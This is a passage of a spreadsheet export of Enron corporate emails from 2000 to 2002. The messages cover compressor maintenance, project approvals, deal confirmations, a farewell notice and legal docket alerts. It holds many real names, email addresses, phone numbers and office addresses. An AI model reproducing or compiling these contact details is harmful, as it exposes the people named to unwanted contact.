EECC, TW Ops Mgmt, and the TW Ops Team all feel that the risk of running _x000D_
without the startup strainer is minimized since the unit has been running _x000D_
intermittently for the past few days and has accumulated some significant run _x000D_
time.  It is expected that  any foreign material in the suction piping should _x000D_
have already been caught in the strainer.  Secondly, the station was designed _x000D_
with a suction scrubber which will further protect the compressor._x000D_
_x000D_
It is expected that the unit will be unavailable until midnight May 4, while _x000D_
the startup strainer is removed.  Care must be taken during the _x000D_
reinstallation of the piping spool as to not affect the compressor alignment _x000D_
or apply stress to the compressor nozzles._x000D_
_x000D_
James Pfeffer_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Jun 2001 10:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.lavorato@enron.com', 'louise.kitchen@enron.com', 'mark.frevert@enron.com', 'greg.whalley@enron.com'})</t>
  </si>
  <si>
    <t>Florida Projects</t>
  </si>
  <si>
    <t>FYI:  The Deerfield Beach City Commission approved the Developer's Agreement _x000D_
for the Deerfield Beach Energy Center today and we expect the Development _x000D_
Review Committee to issue their approval of the project in the morning at a _x000D_
10 am meeting.</t>
  </si>
  <si>
    <t>_x000D_
RIGZONE DAILY NEWS -- THURSDAY, FEBRUARY 21, 2002_x000D_
------------------------------------------------------------_x000D_
Daily News from the worldwide upstream oil &amp; gas industry_x000D_
   to view the complete version, please go to: _x000D_
   http://www.rigzone.com/newsletter_show.asp?n_id=227_x000D_
------------------------------------------------------------</t>
  </si>
  <si>
    <t>Thu, 9 Nov 2000 01:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Q81949 - Superman Resources</t>
  </si>
  <si>
    <t xml:space="preserve">Please send hard copy of deal ticket.  We do not have access.  Otherwise, I _x000D_
think the worksheet is incomplete.  Please complete and include with hard _x000D_
copy of deal ticket.  Has the counterparty requested an Enron Corp guaranty _x000D_
as a condition of doing the deal?_x000D_
_x000D_
_x000D_
_x000D_
	Jason R Williams@ENRON_x000D_
	11/08/2000 03:48 PM_x000D_
		 _x000D_
		 To: Debra Perlingiere/HOU/ECT@ECT, Dan J Hyvl/HOU/ECT@ECT_x000D_
		 cc: Larry Joe Hunter/HOU/ECT@ECT, Derek Bailey/Corp/Enron@ENRON, Janie _x000D_
Aguayo/HOU/ECT@ECT_x000D_
		 Subject: Q81949 - Superman Resources_x000D_
_x000D_
All -_x000D_
_x000D_
Please refer to the attached credit worksheet for terms to be included within _x000D_
the confirmation of trade Q81949 (Superman Resources).  Please let me know if _x000D_
you have any questions._x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jay_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 21 Jan 2000 08:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Eva, are you free for lunch with Rod and me on Thursday, Feb. 3rd?</t>
  </si>
  <si>
    <t>Thu, 27 Dec 2001 15:17:07 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'w..white@enron.com', 'heather.dunton@enron.com', 'hal.mckinney@enron.com', 'fran.chang@enron.com', 'samantha.law@enron.com', 'john.postlethwaite@enron.com'})</t>
  </si>
  <si>
    <t>ERV Notification:  (West Power Desk Daily Position Report -_x000D_
 12/27/2001)</t>
  </si>
  <si>
    <t>The report named: West Power Desk Daily Position Report &lt;http://erv.corp.enron.com/linkFromExcel.asp?report_cd=24&amp;report_name=West+Power+Desk+Daily+Position+Report&amp;category_cd=6&amp;category_name=WEST&amp;toc_hide=1&amp;sTV1=6&amp;TV1Exp=Y&amp;current_efct_date=12/27/2001&gt;, published as of 12/27/2001 is now available for viewing on the website.</t>
  </si>
  <si>
    <t>Wed, 30 May 2001 13:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rusty.belflower@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'lhand@lemle.com', 'lawrence.hand@enron.com'})</t>
  </si>
  <si>
    <t>Re: Timeline for Permitting Napoleonville Storage No</t>
  </si>
  <si>
    <t xml:space="preserve">If I read this correctly it says that we will not receive the storage permit until close to the end of July. I don't want to let anything else slip. Is there any action required on our part to keep things moving?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Lawrence J. Hand, Jr." &lt;lhand@lemle.com&gt; on 05/30/2001 08:24:18 AM_x000D_
To:	"Rusty Belflower (E-mail)" &lt;Rusty.Belflower@enron.com&gt;_x000D_
cc:	 _x000D_
_x000D_
Subject:	Timeline for Permitting Napoleonville Storage No_x000D_
_x000D_
_x000D_
Rusty, this is the proposed timetable I sent to Joe for Comment.  I spoke_x000D_
with him this morning and he agreed to look it over.  He has not yet_x000D_
reviewed the application. I told him to let me know if there are any_x000D_
deficiencies in the application when he looks it over. When are you sending_x000D_
me a copy of the permit application. &lt;&lt;266676_1.doc&gt;&gt;_x000D_
_x000D_
I also talked to Joe about the possibility of dewatering prior to the final_x000D_
order.  If needed, Joe said a work permit could be issued which would allow_x000D_
dewatering.  This is based on a liberal interpretation of the regs, however._x000D_
_x000D_
 - 266676_1.doc _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 11 Jun 2000 20:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'andy.zipper@enron.com', 'louise.kitchen@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a revised version of the Posting Agreement that S&amp;C provided to _x000D_
us.  I have tried to incorporate some additional provisions and inserted a _x000D_
few "place-savers" to mark some areas where we need to discuss the agreement _x000D_
further; for instance, under what circumstances has a party "defaulted" -- _x000D_
and should at least be liable for the other party's out-of-pocket expenses _x000D_
incurred in establishing the interfaces as well as give the other party the _x000D_
right to terminate the agreement -- and under what circumstances should _x000D_
either party be able to walk away (such as, it just doesn't work)?_x000D_
_x000D_
Many of these provisions will be "fleshed out" more when the technical _x000D_
considerations are added, and when we sit down with the counterparty to _x000D_
negotiate this Agreement.  Hopefully the attached gives you something to meet _x000D_
with S&amp;C on Wednesday.  Again, I can participate by phone if any of you think _x000D_
it would be helpful.  The best way to reach me is to leave me a voicemail._x000D_
_x000D_
_x000D_
_x000D_
Travis McCullough_x000D_
Enron North America Corp._x000D_
1400 Smith Street EB 3817_x000D_
Houston Texas 77002_x000D_
Phone:  (713) 853-1575_x000D_
Fax: (713) 646-3490      </t>
  </si>
  <si>
    <t>Fri, 7 Jul 2000 11:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Effective immediately, reporting responsibility for Global Strategic Sourcing _x000D_
(GSS) will move from Enron Net Works to Enron Corp.  George Wasaff, Managing _x000D_
Director, will report directly to Rick Causey, Executive Vice President and _x000D_
Chief Accounting Officer for Enron.  GSS, formed February 1, 2000, will _x000D_
continue to focus on supply-chain management world-wide for Enron.   We _x000D_
believe this change in reporting will leverage and enhance GSS's global reach _x000D_
and effectiveness while allowing ENW to focus on its core mission of creating _x000D_
new electronic market places.</t>
  </si>
  <si>
    <t>Tue, 4 Dec 2001 11:35:15 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cannon_craig@yahoo.com'})</t>
  </si>
  <si>
    <t>your job</t>
  </si>
  <si>
    <t>_x000D_
after all the pain you caused thousands of people,_x000D_
what the hell are you still doing at enron ??_x000D_
you are the one thats to be terminated._x000D_
_x000D_
take a look out your office window ... look at the_x000D_
peoples faces .. the lives you have ruined ..._x000D_
_x000D_
was it worth .... take your 200 million over the past_x000D_
two years and give to those who need it...._x000D_
_x000D_
cc_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Buy the perfect holiday gifts at Yahoo! Shopping._x000D_
http://shopping.yahoo.com</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 06:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rhornby@tca-us.com'})</t>
  </si>
  <si>
    <t>Leaving Enron</t>
  </si>
  <si>
    <t xml:space="preserve"> Congratulations on the new position!  Look forward to seeing you now_x000D_
that you're back in the neighborhood.  Good luck!_x000D_
_x000D_
Rick Hornby_x000D_
617 354 5304 x 115_x000D_
Tabors Caramanis &amp; Associates_x000D_
www.tca-us.com_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Mary.Hain@enron.com [mailto:Mary.Hain@enron.com]_x000D_
Sent: Friday, March 23, 2001 1:24 PM_x000D_
To: David_Aamodt@pgn.com; dapnucc@teleport.com; dick@pnucc.org;_x000D_
seabron.adamson@frontier-economics.com; Frank_Afranji@pgn.com;_x000D_
raa@vnf.com; Joseph.Alamo@enron.com; ajaldrich@snopud.com;_x000D_
Jeff.Alexander@enron.com; Al.Alexanderson@enron.com;_x000D_
Keonee.Almaida@enron.com; hollis.alpert@ferc.fed.us;_x000D_
Brenda.Anderson@enron.com; angles@howry.com; Alan.B.Aronowitz@enron.com;_x000D_
gdb@vnf.com; npbaker@bpa.gov; ellen@tca-us.com; paulb@citizenspower.com;_x000D_
paulb@citizenspower.com; garybarbour@email.msn.com;_x000D_
jbartus@cammckenna.com; glynda.becker@mail.house.gov;_x000D_
Samuel.Behrends@enron.com; bbennett@bpa.gov; sberman@hewm.com;_x000D_
ramsen.betfarhad@mail.house.gov; KBILAS@SKADDEN.COM; sbooye@Skadden.com;_x000D_
raymond.r.boyce@state.or.us; tbradley@bracepatt.com;_x000D_
scott.brattebo@pacificorp.com; sbrose@steptoe.com;_x000D_
sbuchheit@bracepatt.com; alanb@wutc.wa.gov; Jim.Byrne@enron.com;_x000D_
vergil.cabasco@mail.house.gov; johncameron@dwt.com;_x000D_
Doug.Carmichael@enron.com; Ed.Cassidy@enron.com; ajchambe@llgm.com;_x000D_
Melissa.Chiechi@enron.com; elchristensen@snopud.com;_x000D_
kevin.clark@ci.seattle.wa.us; rcloward@avistacorp.com;_x000D_
david_cohen@rniinc.com; Bill.Comish@enron.com;_x000D_
Victor.Contract@enron.com; powerlac@aol.com;_x000D_
Frederick.Coolbroth@enron.com; michaelcorrigan@bchydro.bc.ca;_x000D_
kcorum@nwppc.org; KCurry@bracepatt.com; wcurry@enron.com;_x000D_
gdahlke@paine-hamblen.com; kadaly@mcimail.com; mday@gmssr.com;_x000D_
dearing@chelanpud.org; tdeboer@paine-hamblen.com; Tom_Delaney@enron.com;_x000D_
sdleonard@earthlink.net; dldorrell@stoel.com; Mary.Doyle@enron.com;_x000D_
Jay.Dudley@enron.com; mce2280@idahopower.com;_x000D_
michaelearly@earthlink.net; Katherine.Edwards@enron.com;_x000D_
rle@givenspursley.com; imaxtrans@aol.com; Chris.Elliott@enron.com;_x000D_
sandra.elliott@ferc.fed.us; kerwin@ect.enron.com; dezickson@mwe.com;_x000D_
Jim.Fallon@enron.com; fallonr@howrey.com; Elias.Farrah@enron.com;_x000D_
Michele_Farrell@pgn.com; dfaulk@puget.com; gfergus@brobeck.com;_x000D_
Willard.Fields@enron.com; sfisher@avistaenergy.com; pfox@bracepatt.com;_x000D_
Pat.Franklin@enron.com; John.Frazzell@enron.com; ericf@prestongates.com;_x000D_
don.furman@pacificorp.com; segfurst@bpa.gov; Jackie.Gallagher@enron.com;_x000D_
craiggannett@dwt.com; Alvaro.Garcia@enron.com; sbishop@gibbs-bruns.com;_x000D_
wgibson@nwppc.org; ggilbert@ci.tacoma.wa.us; Pat.Gilman@enron.com;_x000D_
Alex.Goldberg@enron.com; jlgreene@energyadvocates.com;_x000D_
Chris_Groener@mail.house.gov; Mary.Groggin@enron.com;_x000D_
Mark.E.Haedicke@enron.com; Stephen.Hall@enron.com;_x000D_
steve.c.hall@enron.com; Leo.Hamblin@enron.com; whannaford@NWPPC.org;_x000D_
jim.harding@ci.seattle.wa.us; rhardy@hardyenergy.com; kharri@puget.com;_x000D_
Steve_Hawke@pgn.com; dhawkins@caiso.com; marc.hellman@state.or.us;_x000D_
Scott.Helyer@enron.com; mhenry@bracepatt.com; dwmp@teleport.com;_x000D_
rhornby@tca-us.com; mhornst@aol.com; dhuard@jmbm.com;_x000D_
Marlene.Huntsinger@pgn.com; cfi1@tca-us.com;_x000D_
Richard.Ingersoll@enron.com; pljacklin@stoel.com; montrey@aol.com;_x000D_
danj@cfmdc.com; kgjohnson@bpa.gov; ljohnson@pwrteam.com;_x000D_
Karen.E.Jones@enron.com; mkanner@kannerandassoc.com;_x000D_
karid@perkinscoie.com; pkaufma@ect.enron.com; Paul.Kaufman@enron.com;_x000D_
Jeffrey.Keeler@enron.com; Devon Kehoe; James.Keller@enron.com;_x000D_
Joe.Kelliher@mail.house.gov; kkennedy@bdbc.com; Rick.Kessler@enron.com;_x000D_
rdking@bpa.gov; Harry.Kingerski@enron.com; Harry.Kingerski@enron.com;_x000D_
rsk@schwabe.com; gwilliams8@austin.rr.com; John.Klauberg@enron.com;_x000D_
Holli.Krebs@enron.com; ekrogh@wiredweb.com; blafferty@avistacorp.com;_x000D_
wdlamb@bpa.gov; John.Lamb@enron.com; Therese.Lamb@enron.com;_x000D_
srlarson@bpa.gov; Cindy_Tatham@co.washington.or.us;_x000D_
zora.lazic@bchydro.com; kaleathley@bpa.gov; pamela_lesh@pgn.com;_x000D_
Debi.LeVine@enron.com; lcg@europa.com; doug.little@powerex.com;_x000D_
Robert.Loeffler@enron.com; Chris.Long@enron.com; sjlong@bpa.gov;_x000D_
rlopezv@www.conet.com.mx; david_lucio@iep.illinova.com;_x000D_
king.lum@bchydro.bc.ca; kevin.lynch@pacificorp.com;_x000D_
Mark.Maehr@enron.com; Randal.T.Maffett@enron.com;_x000D_
John.Malowney@enron.com; Sueyen.Mao@enron.com; Susan.J.Mara@enron.com;_x000D_
Susan.J.Mara@enron.com; Lee.Martin@enron.com; maurw@perkinscoie.com;_x000D_
Wayne.Mays@enron.com; Michael.McCall@enron.com;_x000D_
Sandra.McCubbin@enron.com; Travis.McCullough@enron.com;_x000D_
Michael.McDonald@enron.com; brugen@erols.com; mckinley@wpuda.org;_x000D_
mcm@vnf.com; mcnichol@wapa.com; shauna@pnucc.org;_x000D_
Maureen.McVicker@enron.com; pmeringolo@brobeck.com; demetcalf@bpa.gov;_x000D_
cemeyer@bpa.gov; jmilegich@sppc.com; fred_miller@pgn.com;_x000D_
Jeffrey.Miller@enron.com; jerry.miller@pacificorp.com;_x000D_
Laura.Miller@enron.com; scott.miller@ferc.fed.us; Bill.Miner@enron.com;_x000D_
phil_moeller@gorton.senate.gov; pmohler@hewm.com; emoler@velaw.com;_x000D_
nkmorgado@bpa.gov; Mike@tonkon.com; krmoxness@bpa.gov;_x000D_
mmps@millcreeklaw.com; pmurphy@mbllp.com; terrym@millcreeklaw.com;_x000D_
bmurtha@acy.sunint.com; Rich.Nassief@enron.com; tod@mgninc.com;_x000D_
Douglas_Nichols@pgn.com; Patty.Nichols@enron.com;_x000D_
Christi.Nicolay@enron.com; tmnoguchi@bpa.gov; darcy@tonkon.com;_x000D_
Sarah.Novasel@enron.com; Sarah.Novosel@enron.com;_x000D_
Tom.O'Donnell@enron.com; PObenchain@idahopower.com; Pegy.Olds@enron.com;_x000D_
Carol.Opatrny@enron.com; tpaine@avistacorp.com; Dave.Parquet@enron.com;_x000D_
bpascoe@mtpower.com; afpaschke@bpa.gov; ccperigo@bpa.gov;_x000D_
wlpernas@stoel.com; lpeters@pacifier.com; jill@pnucc.org;_x000D_
Mona.L.Petrochko@enron.com; npickover@bracepatt.com;_x000D_
Phillip.Platter@enron.com; Alfred.Pollard@enron.com;_x000D_
Walt.Pollock@enron.com; gporter@sppc.com; Kevin.M.Presto@enron.com;_x000D_
jquint@puget.com; arlene.ragozin@ci.seattle.wa.us; maraschio@bpa.gov;_x000D_
Dale.Rasmussen@enron.com; Scott.Rasmussen@enron.com;_x000D_
Bobby.Reeves@enron.com; preiten@pngc.com; reyna2r@kochind.com;_x000D_
shellyr@pacifier.com; Jeff.Richter@enron.com; raroach@bpa.gov;_x000D_
atrodrigues@bpa.gov; rarogers@bpa.gov; peterroi@erols.com;_x000D_
Rothfelder@rlo-law.com; Richard.Sanders@enron.com; jsaven@pacifier.com;_x000D_
Michael.Schilmoeller@enron.com; jschlect@avistacorp.com;_x000D_
Sabine.Schnittger@frontier-economics.com; Diana.Scholtes@enron.com;_x000D_
Roger.Seifert@enron.com; Cara.Semperger@enron.com;_x000D_
asettanni@bracepatt.com; Richard.Shapiro@enron.com; vsharp@enron.com;_x000D_
msmith1@enron.com; Joshua.Sheinkman@enron.com; jshurts@nwppc.org;_x000D_
Sid@enron.com; msizer@ci.tacoma.wa.us; slavens.paula@deps.ppl.com;_x000D_
small@wrightlaw.com; small@wrightlaw.com; douglas.smith@ferc.fed.us;_x000D_
Mike.Smith@enron.com; Roger.Smith@enron.com; Larry.Soderquist@enron.com;_x000D_
Harvey.Spigal@enron.com; mstauffer@mtpower.com;_x000D_
James.D.Steffes@enron.com; James.D.Steffes@enron.com;_x000D_
mestewardpsedc@worldnet.att.net; JKStier@BPA.gov;_x000D_
rbstrong@paine-hamblen.com; DASwanstrom@Verner.com;_x000D_
Mike.Swerzbin@enron.com; tabors@tca-us.com; Ron.Tapscott@enron.com;_x000D_
James.K.Tarpey@enron.com; Jake.Thomas@enron.com;_x000D_
ryan_thomas@burns.senate.gov; jrt2058@idahopower.com; maryann@pnucc.org;_x000D_
mtierney@sempra.com; robin_tompkins@pgn.com; Ann.Tumlinson@enron.com;_x000D_
AW.Turner@enron.com; Sheila.Tweed@enron.com; Lisa.Urick@enron.com;_x000D_
rvermeers@avistacorp.com; Frank.W.Vickers@enron.com;_x000D_
John.Walley@enron.com; kristiwallis@sprintmail.com; walshl@howrey.com;_x000D_
swalton@enron.com; Steve.Walton@enron.com; kaward@bpa.gov;_x000D_
Kim.Ward@enron.com; Carol.Wardell@enron.com; dwatkiss@bracepatt.com;_x000D_
sawatson@bpa.gov; judy.welch@NWPP.ORG; 211-6155@MCIMAIL.COM;_x000D_
Kwenzel@zzz.com; cwestadt@sppc.com; Brian.Whalen@enron.com;_x000D_
Bill.Williams@enron.com; klwmtp@worldnet.att.net; lyn_williams@pgn.com;_x000D_
Greg.Wolfe@enron.com; Vickie.Wolk-Laniewski@enron.com;_x000D_
Ed.Wood@enron.com; mwood@stoel.com; Steve.Wright@enron.com;_x000D_
Teresa.L.Wright@enron.com; WSCC@enron.com; Charles.Yeung@enron.com;_x000D_
Christian.Yoder@enron.com; Steven.J.Kean@enron.com;_x000D_
Steve.Kean@enron.com; Travel.in.the.Park@enron.com;_x000D_
D.Brett.Hunsucker@enron.com; Carla.Hoffman@enron.com;_x000D_
Bernadette.Hawkins@enron.com; Joe.Hartsoe@enron.com;_x000D_
Donna.Fulton@enron.com; Roger.Fragua@enron.com;_x000D_
James.B.Fallon@enron.com; Michael.Etringer@enron.com;_x000D_
Terry.W.Donovan@enron.com; Stacy.Dickson@enron.com;_x000D_
Ginger.Dernehl@enron.com; Rhonda.L.Denton@enron.com;_x000D_
Jeff.Dasovich@enron.com; Sean.Crandall@enron.com; Tom.Briggs@enron.com;_x000D_
t.briggs@enron.com; Stacey.Bolton@enron.com; dbenevid@enron.com;_x000D_
dbenevid@enron.com; Tim.Belden@enron.com; Robert.Badeer@enron.com;_x000D_
Phillip.K.Allen@enron.com; Alan.Comnes@enron.com; Lysa.Akin@enron.com;_x000D_
Portland.West.Desk@enron.com; assad@elektro.com.br;_x000D_
Alan.Comnes@enron.com; Alberto.Levy@enron.com; Aleck.Dadson@enron.com;_x000D_
Allison.Navin@enron.com; Amy.Fabian@enron.com;_x000D_
Barbara.A.Hueter@enron.com; Bernadette.Hawkins@enron.com;_x000D_
Bill.Moore@enron.com; cristinah@elektro.com.br;_x000D_
Carlos.Gustavo.Azevedo@enron.com; Carmen.Perez@enron.com;_x000D_
Carolyn.Cooney@enron.com; Charles.Yeung@enron.com;_x000D_
Chauncey.Hood@enron.com; Chris.Long@enron.com;_x000D_
Christi.L.Nicolay@enron.com; Cynthia.Sandherr@enron.com;_x000D_
Damon.Harvey@enron.com; Dan.Staines@enron.com;_x000D_
Daniel.Allegretti@enron.com; Dave.Mangskau@enron.com;_x000D_
Donald.Lassere@enron.com; Donna.Fulton@enron.com; Eidy.Catala@enron.com;_x000D_
Elizabeth.Linnell@enron.com; Frank.Rishe@enron.com;_x000D_
Geriann.Warner@enron.com; Ginger.Dernehl@enron.com;_x000D_
Gisele.S.Braz@enron.com; Gloria.Ogenyi@enron.com;_x000D_
Guillermo.Canovas@enron.com; Harry.Kingerski@enron.com;_x000D_
Howard.Fromer@enron.com; James.D.Steffes@enron.com;_x000D_
Janine.Migden@enron.com; Javier.Pantoja@enron.com;_x000D_
Jean.R.Dressler@enron.com; Jean.Ryall@enron.com; Jeff.Brown@enron.com;_x000D_
Jeff.Dasovich@enron.com; Jeffrey.Keeler@enron.com;_x000D_
Joao.Paixao@enron.com; Joe.Allen@enron.com; Joe.Connor@enron.com;_x000D_
Joe.Hartsoe@enron.com; Joe.Hillings@enron.com; Jose.Bestard@enron.com;_x000D_
Joseph.Alamo@enron.com; Kathleen.Sullivan@enron.com;_x000D_
Kerry.Stroup@enron.com; Kikumi.Kishigami@enron.com;_x000D_
Kirsten.Bellas@enron.com; Lara.Leibman@enron.com;_x000D_
Laurie.Knight@enron.com; Leslie.Lawner@enron.com;_x000D_
Linda.J.Noske@enron.com; Linda.Robertson@enron.com;_x000D_
Lindsay.Meade@enron.com; Lisa.Yoho@enron.com; Lora.Sullivan@enron.com;_x000D_
Luiz.Maurer@enron.com; Lysa.Akin@enron.com; Marchris.Robinson@enron.com;_x000D_
Marcia.A.Linton@enron.com; Marcie.Milner@enron.com; Mary.Hain@enron.com;_x000D_
Maureen.McVicker@enron.com; Melinda.Pharms@enron.com;_x000D_
Michelle.Belzak@enron.com; Mona.L.Petrochko@enron.com;_x000D_
Nancy.Hetrick@enron.com; Patrick.Keene@enron.com; Ray.Alvarez@enron.com;_x000D_
Rebecca.W.Cantrell@enron.com; Ricardo.Charvel@enron.com;_x000D_
Richard.Ingersoll@enron.com; Richard.Shapiro@enron.com;_x000D_
Robert.Frank@enron.com; Robert.Hemstock@enron.com;_x000D_
Robert.Neustaedter@enron.com; Robin.Kittel@enron.com;_x000D_
Ron.McNamara@enron.com; rboston@enron.com; Rubena.Buerger@enron.com;_x000D_
Sandra.McCubbin@enron.com; Sarah.Novosel@enron.com;_x000D_
Scott.Bolton@enron.com; Sergio.Assad@enron.com; Stella.Chan@enron.com;_x000D_
Stephen.D.Burns@enron.com; Steve.Montovano@enron.com;_x000D_
Steve.Walton@enron.com; Steven.J.Kean@enron.com; Sue.Nord@enron.com;_x000D_
Susan.J.Mara@enron.com; Susan.M.Landwehr@enron.com;_x000D_
Terri.Miller@enron.com; Thane.Twiggs@enron.com; Tom.Briggs@enron.com;_x000D_
Tom.Chapman@enron.com; Tom.Delaney@enron.com; Tom.Hoatson@enron.com;_x000D_
Tracy.Cooper@enron.com; Valeria.Lima@enron.com; Vinio.Floris@enron.com;_x000D_
Xi.Xi@enron.com; Steven.J.Kean@enron.com; Jeffrey.Keeler@enron.com;_x000D_
Christi.L.Nicolay@enron.com; Sarah.Novosel@enron.com;_x000D_
Robert.Frank@enron.com; Lara.Leibman@enron.com; Gloria.Ogenyi@enron.com;_x000D_
Richard.Shapiro@enron.com; Leslie.Lawner@enron.com;_x000D_
Paul.Kaufman@enron.com; Aleck.Dadson@enron.com;_x000D_
Daniel.Allegretti@enron.com; Howard.Fromer@enron.com;_x000D_
Joe.Hartsoe@enron.com; rboston@enron.com; Janine.Migden@enron.com;_x000D_
Christie.Patrick@enron.com; Jane.Wilson@enron.com;_x000D_
Rhonda.L.Denton@enron.com; kmagruder@newpower.com; scovino@newpower.com;_x000D_
Rebecca.Carter@enron.com; Shelley.Corman@enron.com;_x000D_
Janet.Butler@enron.com; Kevin.M.Presto@enron.com;_x000D_
Brad.Richter@enron.com; Greg.Piper@enron.com; Kevin.McGowan@enron.com;_x000D_
Kim.Ward@enron.com; Leslie.Reeves@enron.com_x000D_
Subject: I'm Leaving Enron_x000D_
_x000D_
_x000D_
I am going to be the Senior Regulatory Counsel at ISO New England starting_x000D_
on April 9, 2001.   My last day in the Portland area will be March 31,_x000D_
2001.  I enjoyed working with you and wish you the best of everything.  My_x000D_
new address will be:_x000D_
_x000D_
Mary Hain_x000D_
Senior Regulatory Counsel_x000D_
ISO New England Inc._x000D_
One Sullivan Road_x000D_
Holyoke, MA  01040-2841_x000D_
(413) 535-4000_x000D_
mhain@ISO-NE.com</t>
  </si>
  <si>
    <t>Mon, 1 Oct 2001 09:30:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>Douglas Co. PUD</t>
  </si>
  <si>
    <t>Douglas County has been trying to get signed up with EOL for over a month.  From what the Help Desk is telling me, they believe its sitting with legal at this point.  Can you please assist us in getting their paperwork finished?_x000D_
_x000D_
Much appreciated!_x000D_
_x000D_
Diana Scholtes_x000D_
West Power_x000D_
503-464-3807</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 02:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CaseStream Docket Information</t>
  </si>
  <si>
    <t xml:space="preserve">Richard, looks like a new case for your group.   I would be glad to introduce _x000D_
you to John.  He has been recommended to me by others before, but as you know _x000D_
my businesses only get sued in Curitiba and San Salvador, and I didn't want _x000D_
to visit that on him.  _x000D_
---------------------- Forwarded by Robert C Williams/ENRON_DEVELOPMENT on _x000D_
12/04/2000 10:46 AM ---------------------------_x000D_
_x000D_
_x000D_
"John Sullivan" &lt;jsullivan@fulbright.com&gt; on 12/04/2000 10:13:44 AM_x000D_
To: Robert.C.Williams@Enron.com_x000D_
cc: jsullivan@fulbright.com _x000D_
_x000D_
Subject: CaseStream Docket Information_x000D_
_x000D_
_x000D_
Bob,_x000D_
_x000D_
I came across this new federal filing on case stream that I thought you might _x000D_
want to know about.  It looks like a breach of contract case filed against _x000D_
ECT and ENA in Judge Hoyt's court._x000D_
_x000D_
Let us know if you need any assistance with the defense of this matter as we _x000D_
would love to have the opportunity to show you our capabilities.  I've done _x000D_
some work for the litigation unit, but none yet for ECT or ENA.  From my _x000D_
previous conversations with Jim Derrick, I understand that we are approved _x000D_
for general litigation matters.  Also, I'd love the opportunity to work with _x000D_
you and/or Richard Sanders._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
John_x000D_
_x000D_
P.S._x000D_
_x000D_
I saw that you and Elaine got your tree this weekend.  We are still on our _x000D_
quest for a tree after striking out at four different places yesterday.  _x000D_
Where did you find yours?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-------------------------------------------------------------------------_x000D_
Using CaseStream, John Sullivan has located a case that you may find _x000D_
interesting:_x000D_
_x000D_
S D Tex 4:00cv4108 - Votorantim Cimentos v. Enron Capital, et al_x000D_
_x000D_
You may view the entire case record at no charge at the CaseStream web site _x000D_
by clicking the link below._x000D_
_x000D_
http://www.marketspan.com/DocketDirect/MSFDock.asp?DType=0&amp;Code=50341921671591_x000D_
5016322910015915916916323223111_x000D_
_x000D_
-------------------------------------------------------------------------_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 3 Jan 2001 09:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: My time - Suggestion</t>
  </si>
  <si>
    <t xml:space="preserve">That's fine.  We don't keep particularly careful track of these things but _x000D_
pretty much estimate the percentages on a quarterly basis._x000D_
_x000D_
_x000D_
_x000D_
	Francisco Pinto Leite@ENRON_DEVELOPMENT_x000D_
	01/03/2001 04:13 PM_x000D_
		 _x000D_
		 To: Mark Taylor@ECT_x000D_
		 cc: _x000D_
		 Subject: My time - Suggestion_x000D_
_x000D_
Mark:_x000D_
_x000D_
A suggestion.  I assume that whatever time I spend working for Global Assets, _x000D_
you will be charging back to the Global Assets group.   To keep things easy, _x000D_
I will be happy to let you know as often as you need the percentage of my _x000D_
time spent with the Global Assets group.   If you have other plans please let _x000D_
me know and I will be happy to do whatever is necessary to keep this simple _x000D_
and easy._x000D_
_x000D_
_x000D_
FPL_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 08:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 05/21/2001 03:26 PM -----_x000D_
_x000D_
	Cheryl Nelson@ENRON_x000D_
	Sent by: Cheryl Nelson@ENRON_x000D_
	05/21/2001 12:27 PM_x000D_
		_x000D_
		 To: Stephanie Panus/NA/Enron@Enron_x000D_
		 cc: Keegan Farrell/NA/Enron@Enron, Sara Shackleton/HOU/ECT@ECT_x000D_
		 Subject: Re: Enron Corp./Enron Credit Inc. ("ECI") guaranty amendment _x000D_
(increase from USD25 Million to USD100 Million) in favor of Bear, Stearns, et _x000D_
al_x000D_
_x000D_
Stephanie, you may want to clarify all of the facts as well.  That a local _x000D_
phone number was disconnected is irrelevant because keegan called my cell _x000D_
phone number and spoke with my fiance.  He and Keegan then called my house in _x000D_
New York and notified my family that Keegan wanted to reach me.  They _x000D_
conveyed that message to me immediately as I walked though the door.  I then _x000D_
immediately called Keegan the minute I walked into my house in New York.  _x000D_
_x000D_
As I mentioned to Sara, if you need to reach me  _x000D_
_x000D_
Cheryl Nelson_x000D_
Senior Counsel_x000D_
EB3816_x000D_
(713) 345-4693_x000D_
http://gss.enron.com/_x000D_
_x000D_
_x000D_
_x000D_
	Stephanie Panus_x000D_
	05/21/2001 11:54 AM_x000D_
		_x000D_
